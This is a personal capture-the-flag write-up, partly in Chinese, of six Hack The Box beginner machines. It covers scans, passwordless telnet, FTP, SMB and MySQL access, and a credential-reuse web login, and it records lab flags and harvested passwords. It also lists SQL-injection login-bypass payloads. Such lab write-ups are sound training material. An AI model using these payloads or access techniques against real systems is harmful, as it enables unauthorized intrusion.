htb:starting points machines in 2021.10

1. 连接vpn

使用openvpn连接，需要sudo，好像有点奇怪，之前不用的。

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo openvpn starting_point_spwpun.ovpn                                                                    1 ⨯
[sudo] password for kali: 
2021-10-28 15:16:41 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set.
2021-10-28 15:16:41 DEPRECATED OPTION: --cipher set to 'AES-128-CBC' but missing in --data-ciphers (AES-256-GCM:AES-128-GCM). Future OpenVPN version will ignore --cipher for cipher negotiations. Add 'AES-128-CBC' to --data-ciphers or change --cipher 'AES-128-CBC' to --data-ciphers-fallback 'AES-128-CBC' to silence this warning.
2021-10-28 15:16:41 OpenVPN 2.5.0 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Oct 28 2020
2021-10-28 15:16:41 library versions: OpenSSL 1.1.1i  8 Dec 2020, LZO 2.10
2021-10-28 15:16:41 Outgoing Control Channel Encryption: Cipher 'AES-256-CTR' initialized with 256 bit key
2021-10-28 15:16:41 Outgoing Control Channel Encryption: Using 256 bit message hash 'SHA256' for HMAC authentication
2021-10-28 15:16:41 Incoming Control Channel Encryption: Cipher 'AES-256-CTR' initialized with 256 bit key
2021-10-28 15:16:41 Incoming Control Channel Encryption: Using 256 bit message hash 'SHA256' for HMAC authentication
2021-10-28 15:16:42 TCP/UDP: Preserving recently used remote address: [AF_INET]5.44.235.181:443
2021-10-28 15:16:42 Socket Buffers: R=[131072->131072] S=[16384->16384]
2021-10-28 15:16:42 Attempting to establish TCP connection with [AF_INET]5.44.235.181:443 [nonblock]
2021-10-28 15:16:42 TCP connection established with [AF_INET]5.44.235.181:443
2021-10-28 15:16:42 TCP_CLIENT link local: (not bound)
2021-10-28 15:16:42 TCP_CLIENT link remote: [AF_INET]5.44.235.181:443
2021-10-28 15:16:42 TLS: Initial packet from [AF_INET]5.44.235.181:443, sid=13956ae1 9f9d3589
2021-10-28 15:16:43 VERIFY OK: depth=1, CN=HackTheBox

2. Process

得到目标ip：10.129.148.244

nmap：

──(kali㉿kali)-[~/Desktop]
└─$ nmap -sC -sV 10.129.148.244
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-28 15:26 EDT
Nmap scan report for bogon (10.129.148.244)
Host is up (0.80s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.40 seconds

telnet test:

──(kali㉿kali)-[~/Desktop]
└─$ telnet 10.129.148.244                                                                                       1 ⨯
Trying 10.129.148.244...
Connected to 10.129.148.244.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█


Meow login: admin
Password: 

Login incorrect
Meow login: meow
Password: 

Login incorrect
Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 28 Oct 2021 07:42:54 PM UTC

  System load:  0.08              Processes:             135
  Usage of /:   41.7% of 7.75GB   Users logged in:       0
  Memory usage: 4%                IPv4 address for eth0: 10.129.148.244
  Swap usage:   0%

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Sep  6 15:15:23 UTC 2021 from 10.10.14.18 on pts/0
root@Meow:~# whoami
root
root@Meow:~# ls
flag.txt  snap
root@Meow:~# cat flag.txt 
b40abdfe23665f766f9c61ecba8a4c19
root@Meow:~# 

3. Success

Fawn

10.129.150.22:

──(kali㉿kali)-[~]
└─$ nmap -sC -sV 10.129.150.22   
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-28 22:54 EDT
Nmap scan report for 10.129.150.22
Host is up (1.1s latency).
Not shown: 998 closed ports
PORT      STATE    SERVICE VERSION
21/tcp    open     ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              32 Jun 04 03:25 flag.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.16.69
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
54045/tcp filtered unknown
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 160.55 seconds
                                                                                                                    
┌──(kali㉿kali)-[~]

connectted ftp using anonymous user to get the flag.txt:

┌──(kali㉿kali)-[~]
└─$ ftp 10.129.150.22                                                                                       1 ⨯ 1 ⚙
Connected to 10.129.150.22.
220 (vsFTPd 3.0.3)
Name (10.129.150.22:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cat flag.txt
?Invalid command
ftp> get flag.txt
local: flag.txt remote: flag.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for flag.txt (32 bytes).
226 Transfer complete.
32 bytes received in 0.00 secs (214.0411 kB/s)
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              32 Jun 04 03:25 flag.txt
226 Directory send OK.
ftp> bye
221 Goodbye.
                                                                                                                    
┌──(kali㉿kali)-[~]
└─$ cat flag.txt                                                                                                1 ⚙
035db21c881520061c53e0536e44f815                                                                                                                    
┌──(kali㉿kali)-[~]
└─$         

Dancing

10.129.150.33:

─$ nmap -sC -sV 10.129.150.33                                                                            127 ⨯ 1 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-29 01:24 EDT
Nmap scan report for 10.129.150.33
Host is up (0.97s latency).
Not shown: 995 closed ports
PORT     STATE    SERVICE       VERSION
135/tcp  open     msrpc         Microsoft Windows RPC
139/tcp  open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open     microsoft-ds?
481/tcp  filtered dvs
3995/tcp filtered iss-mgmt-ssl
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4h09m54s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-10-29T09:38:17
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 249.09 seconds

└─$ smbclient -L 10.129.150.33                                                                              1 ⨯ 1 ⚙
Enter WORKGROUP\kali's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk      
SMB1 disabled -- no workgroup available

──(kali㉿kali)-[~]
└─$ smbclient \\\\10.129.150.33\\WorkShares                                                                     1 ⚙
Enter WORKGROUP\kali's password: 
Try "help" to get a list of possible commands.
smb: \> cd Amy.J
smb: \Amy.J\> ls
  .                                   D        0  Mon Mar 29 05:08:24 2021
  ..                                  D        0  Mon Mar 29 05:08:24 2021
  worknotes.txt                       A       94  Fri Mar 26 07:00:37 2021
mo
                5114111 blocks of size 4096. 1753764 blocks available
smb: \Amy.J\> more worknotes.txt
getting file \Amy.J\worknotes.txt of size 94 as /tmp/smbmore.Vl8cXX (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \Amy.J\> cd ../James.P
smb: \James.P\> ls
  .                                   D        0  Thu Jun  3 04:38:03 2021
  ..                                  D        0  Thu Jun  3 04:38:03 2021
  flag.txt                            A       32  Mon Mar 29 05:26:57 2021
more flag
                5114111 blocks of size 4096. 1753764 blocks available
smb: \James.P\> more flag.txt
getting file \James.P\flag.txt of size 32 as /tmp/smbmore.iI2ox0 (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \James.P\> get flag.txt 
getting file \James.P\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \James.P\> quit
                                                                                                                    
┌──(kali㉿kali)-[~]
└─$ cat flag.txt                                                                                                1 ⚙
5f61c10dffbc77a704d76016a22f1664                                                                                                 

Appointment

SQL，basic, 10.129.150.95

nmap scan, got port 80 is open for httpd, it’s a login webpage.

dirb to brute-forcing, no result.

test sql basics:

username: admin' #
passwd: none

got flag!

e3d0796d002a446c0e622226f42e9672

SQL basics:

1’ OR ‘1’=’1

' or 1='1
'or'='or'
admin
admin'--
admin' or 4=4--
admin' or '1'='1'--
admin888
"or "a"="a
admin' or 2=2#
a' having 1=1#
a' having 1=1--
admin' or '2'='2
')or('a'='a
or 4=4--
c
a'or' 4=4--
"or 4=4--
'or'a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 4=4
'OR 4=4%00
"or 4=4%00
'xor
admin' UNION Select 1,1,1 FROM admin Where ''='
1
-1%cf' union select 1,1,1 as password,1,1,1 %23
1
17..admin' or 'a'='a 密码随便
'or'='or'
'or 4=4/*
something
' OR '1'='1
1'or'1'='1
admin' OR 4=4/*
1'or'1'='1

安装gobuster：

sudo apt install golang-go -y

sudo apt install gccgo-go -y

go install github.com/OJ/gobuster/v3@latest

Sequel

rustscan:

└─$ rustscan --help                                                                                             1 ⚙
rustscan 2.0.0
Fast Port Scanner built in Rust. WARNING Do not use this program against sensitive infrastructure since the specified
server may not be able to handle this many socket connections at once. - Discord https://discord.gg/GFrQsGy - GitHub
https://github.com/RustScan/RustScan

USAGE:
    rustscan [FLAGS] [OPTIONS] [-- <command>...]

FLAGS:
        --accessible    Accessible mode. Turns off features which negatively affect screen readers
    -g, --greppable     Greppable mode. Only output the ports. No Nmap. Useful for grep or outputting to a file
    -h, --help          Prints help information
    -n, --no-config     Whether to ignore the configuration file or not
        --top           Use the top 1000 ports
    -V, --version       Prints version information

OPTIONS:
    -a, --addresses <addresses>...    A list of comma separated CIDRs, IPs, or hosts to be scanned
    -b, --batch-size <batch-size>     The batch size for port scanning, it increases or slows the speed of scanning.
                                      Depends on the open file limit of your OS.  If you do 65535 it will do every port
                                      at the same time. Although, your OS may not support this [default: 4500]
    -p, --ports <ports>...            A list of comma separed ports to be scanned. Example: 80,443,8080
    -r, --range <range>               A range of ports with format start-end. Example: 1-1000
        --scan-order <scan-order>     The order of scanning to be performed. The "serial" option will scan ports in
                                      ascending order while the "random" option will scan ports randomly [default:
                                      serial]  [possible values: Serial, Random]
        --scripts <scripts>           Level of scripting required for the run [default: default]  [possible values:
                                      None, Default, Custom]
    -t, --timeout <timeout>           The timeout in milliseconds before a port is assumed to be closed [default: 1500]
        --tries <tries>               The number of tries before a port is assumed to be closed. If set to 0, rustscan
                                      will correct it to 1 [default: 1]
    -u, --ulimit <ulimit>             Automatically ups the ULIMIT with the value you provided

ARGS:
    <command>...    The Script arguments to run. To use the argument -A, end RustScan's args with '-- -A'. Example:
                    'rustscan -T 1500 127.0.0.1 -- -A -sC'. This command adds -Pn -vvv -p $PORTS automatically to
                    nmap. For things like --script '(safe and vuln)' enclose it in quotations marks \"'(safe and
                    vuln)'\"")
                                

scan result:

┌──(kali㉿kali)-[~]
└─$ rustscan --top -a 10.129.150.160 -b 1000  -t 5000 -u 5000 -- -A -sV                                         1 ⚙
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.150.160:3306
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-29 06:57 EDT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 06:57
Completed NSE at 06:57, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 06:57
Completed NSE at 06:57, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 06:57
Completed NSE at 06:57, 0.00s elapsed
Initiating Ping Scan at 06:57
Scanning 10.129.150.160 [2 ports]
Completed Ping Scan at 06:57, 0.97s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:57
Completed Parallel DNS resolution of 1 host. at 06:57, 1.03s elapsed
DNS resolution of 1 IPs took 1.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 06:57
Scanning 10.129.150.160 [1 port]
Discovered open port 3306/tcp on 10.129.150.160
Completed Connect Scan at 06:57, 0.24s elapsed (1 total ports)
Initiating Service scan at 06:57
Scanning 1 service on 10.129.150.160
Stats: 0:00:56 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Completed Service scan at 07:00, 173.98s elapsed (1 service on 1 host)
NSE: Script scanning 10.129.150.160.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:00
NSE Timing: About 99.30% done; ETC: 07:00 (0:00:00 remaining)
Completed NSE at 07:01, 44.50s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:01
NSE Timing: About 87.50% done; ETC: 07:01 (0:00:04 remaining)
Completed NSE at 07:01, 44.25s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:01
Completed NSE at 07:01, 0.00s elapsed
Nmap scan report for 10.129.150.160
Host is up, received conn-refused (0.88s latency).
Scanned at 2021-10-29 06:57:31 EDT for 265s

PORT     STATE SERVICE REASON  VERSION
3306/tcp open  mysql?  syn-ack
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
|   Thread ID: 82
|   Capabilities flags: 63486
|   Some Capabilities: Support41Auth, Speaks41ProtocolOld, ODBCClient, ConnectWithDatabase, InteractiveClient, DontAllowDatabaseTableColumn, IgnoreSigpipes, SupportsLoadDataLocal, SupportsCompression, SupportsTransactions, Speaks41ProtocolNew, FoundRows, IgnoreSpaceBeforeParenthesis, LongColumnFlag, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: A)Ir%](M*)1XG;3,%p)y
|_  Auth Plugin Name: mysql_native_password
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:01
Completed NSE at 07:01, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:01
Completed NSE at 07:01, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:01
Completed NSE at 07:01, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 265.94 seconds

                                                                                                                    
┌──(kali㉿kali)-[~]
└─$                   

mysql -h 10.129.150.160 -u root
mysql> show databases；
mysql> use htb；
mysql> show tables;
mysql> select * from config;

then got flag.

mysql cheat-sheet: https://www.mysqltutorial.org/mysql-cheat-sheet.aspxC

Crocodile

10.129.151.56

rustscan: 21, 80

then use nmap to scan specifoc ports:

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 10.129.151.56 -p 21,80                                                                         1 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-29 08:18 EDT
Nmap scan report for 10.129.151.56
Host is up (0.37s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp            33 Jun 08 10:58 allowed.userlist
|_-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.16.69
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Smash - Bootstrap Business Template
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.60 seconds

anonymous login to ftp: get user/pwd lists.

userlist:
aron
pwnmeow
egotisticalsw
admin
pwdlist:
root
Supersecretpassword1
@BaASD&9032123sADS
rKXM59ESxesUFHAd

use admin/rKXM59ESxesUFHAd to login at http://10.129.151.56/login.php , then got flag!

c7110277ac44d78b6a9fff2232434d16.